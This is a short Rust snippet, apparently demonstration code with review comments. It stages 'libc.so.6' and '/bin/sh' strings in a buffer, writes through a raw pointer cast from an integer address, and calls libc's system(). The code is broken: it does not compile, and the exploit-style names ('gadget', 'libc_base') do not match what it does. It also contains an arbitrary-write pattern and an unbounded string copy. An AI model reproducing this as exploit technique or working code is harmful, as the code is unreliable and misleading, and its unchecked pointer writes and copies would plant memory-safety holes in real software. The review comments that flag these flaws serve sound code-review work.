extern crate libc;
use libc::{c_void, system};
// Demonstration snippet: stages two NUL-terminated byte strings in a local buffer,
// writes the buffer's address through a pointer built from a raw integer, and then
// calls libc's system().
// NOTE(review): the `let` statements below sit at module level; as shown this does not
// look like compilable Rust unless it is wrapped in a function body. Confirm against the
// full file.
// Size in bytes of the local staging buffer.
const BUFFER_SIZE : usize = 200;
let addr : u64 = 0x00000000; // placeholder destination address; 0 is the null address
// Byte strings with an explicit trailing NUL.
let libc_name : &[u8] = b"libc.so.6\0";
let gadget : &[u8] = b"/bin/sh\0";
// Zero-initialised buffer, so bytes that are never written stay 0.
let mut buf : [u8;BUFFER_SIZE] = [0u8;BUFFER_SIZE];
// Copy libc_name to the start of buf. copy_string returns its `dest` argument, so
// libc_base is simply the address of buf[0].
let libc_base = copy_string(buf.as_mut_ptr() as *mut c_void, libc_name.as_ptr() as *const c_void);
// Copy gadget to buf + libc_name.len(); that length counts the trailing NUL, so the second
// string starts right after the first one's terminator.
// NOTE(review): raw-pointer `offset` is an unsafe call taking an isize, but it is used here
// outside an `unsafe` block with a usize argument. gadget_base is not read again in this run.
let gadget_base = copy_string(buf.as_mut_ptr().offset(libc_name.len()) as *mut c_void, gadget.as_ptr() as *const c_void);
// Turn the integer in `addr` into a raw pointer. Nothing checks that it is mapped or
// writable; this integer-to-pointer cast is the arbitrary-write pattern reviewers should flag.
let mut pointer = addr as *mut u64;
// Store the address of buf at the location `pointer` refers to.
// NOTE(review): with addr left at 0 this writes through a null pointer, which is undefined
// behaviour; `write` on a raw pointer is also unsafe and appears outside an `unsafe` block.
pointer.write(buf.as_ptr() as u64);
// Direct call to libc's system() with libc_base, i.e. the start of buf, which at this point
// holds the bytes of libc_name. Nothing here returns into libc; it is an ordinary call.
// NOTE(review): libc's system() is declared with a C-string pointer parameter, while
// libc_base is a `*mut c_void`, so a cast would be needed. Confirm against the libc crate
// version in use.
unsafe { system(libc_base); }
// function to copy data from one memory location to another
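/// Copies the bytes of the NUL-terminated string at `src` to `dest` and returns `dest`.
///
/// The terminating NUL itself is not copied, so `dest` only holds a valid C string if the
/// byte after the copied data is already zero. If either pointer is null, nothing is copied
/// and `dest` is returned as given.
///
/// Review note: this is an unbounded copy. The function is not marked `unsafe`, yet the
/// caller must guarantee that `src` points to readable memory ending in a 0 byte, that
/// `dest` has room for every byte before that terminator, and that the two regions do not
/// overlap. There is no destination-length parameter to enforce any of this.
fn copy_string(dest: *mut c_void, src: *const c_void) -> *mut c_void {
    if dest.is_null() || src.is_null() {
        return dest;
    }
    // `c_void` cannot be dereferenced and compared with an integer, so scan as bytes.
    let src_bytes = src as *const u8;
    // usize rather than u32: it is the type the pointer arithmetic and the copy expect.
    let mut size: usize = 0;
    // SAFETY: both pointers are non-null (checked above); the caller guarantees that `src`
    // is NUL-terminated and that `dest` can hold `size` bytes without overlapping `src`.
    unsafe {
        while *src_bytes.add(size) != 0 {
            size += 1;
        }
        std::ptr::copy_nonoverlapping(src_bytes, dest as *mut u8, size);
    }
    dest
}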